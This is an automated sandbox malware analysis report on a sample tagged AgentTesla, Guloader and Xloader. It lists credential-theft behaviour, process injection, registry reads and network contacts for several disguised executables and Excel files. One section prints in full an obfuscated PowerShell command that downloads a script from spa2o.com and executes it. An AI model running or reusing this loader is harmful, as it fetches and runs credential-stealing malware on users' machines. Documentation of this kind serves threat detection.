Malware Analysis Report

2024-12-06 03:12

Sample ID 241121-y6rffaxja1
Target 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca
SHA256 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca
Tags
discovery defense_evasion agenttesla collection credential_access keylogger spyware stealer trojan guloader downloader xloader nqni loader rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca

Threat Level: Known bad

The file 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca was found to be: Known bad.

Malicious Activity Summary

discovery defense_evasion agenttesla collection credential_access keylogger spyware stealer trojan guloader downloader xloader nqni loader rat

Guloader,Cloudeye

Xloader family

Agenttesla family

Guloader family

AgentTesla

Xloader

Xloader payload

AgentTesla payload

Blocklisted process makes network request

Checks computer location settings

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Loads dropped DLL

Reads user/profile data of local email clients

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Hide Artifacts: Ignore Process Interrupts

Unsigned PE

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Gathers system information

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 20:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3924 -ip 3924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 195.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 spa2o.com udp
HR 185.58.73.32:80 spa2o.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/1116-0-0x00007FFDF20F3000-0x00007FFDF20F5000-memory.dmp

memory/1116-1-0x00000000005B0000-0x00000000005B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ymwjjgs.h5c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4008-12-0x000002562A340000-0x000002562A362000-memory.dmp

memory/4008-13-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-14-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-15-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-16-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-19-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 sync-shop.com udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 225.219.220.74.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.235:80 r11.o.lencr.org tcp
US 8.8.8.8:53 26.58.22.2.in-addr.arpa udp
US 8.8.8.8:53 235.86.200.23.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.235:80 r11.o.lencr.org tcp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp

Files

memory/2588-0-0x0000000002220000-0x0000000002221000-memory.dmp

memory/2588-2-0x0000000000406000-0x0000000000407000-memory.dmp

memory/2588-3-0x0000000000400000-0x00000000004AD000-memory.dmp

memory/2588-4-0x0000000002220000-0x0000000002221000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

61s

Max time network

19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls

Network

N/A

Files

memory/2344-1-0x00000000722CD000-0x00000000722D8000-memory.dmp

memory/2344-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2344-3-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-6-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-7-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-5-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-4-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-2-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-8-0x00000000722CD000-0x00000000722D8000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

130s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 268 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Network

N/A

Files

memory/268-0-0x000000007412E000-0x000000007412F000-memory.dmp

memory/268-1-0x0000000000DC0000-0x0000000000E92000-memory.dmp

memory/268-2-0x0000000074120000-0x000000007480E000-memory.dmp

memory/268-3-0x0000000000380000-0x000000000038E000-memory.dmp

memory/268-4-0x000000007412E000-0x000000007412F000-memory.dmp

memory/268-5-0x0000000074120000-0x000000007480E000-memory.dmp

memory/268-6-0x00000000056B0000-0x000000000576C000-memory.dmp

memory/268-7-0x0000000000710000-0x000000000074C000-memory.dmp

memory/2744-8-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-12-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-20-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-18-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-14-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2744-13-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-16-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-11-0x0000000000400000-0x000000000043C000-memory.dmp

memory/268-21-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-22-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-23-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-24-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-25-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-26-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-27-0x0000000074120000-0x000000007480E000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

148s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
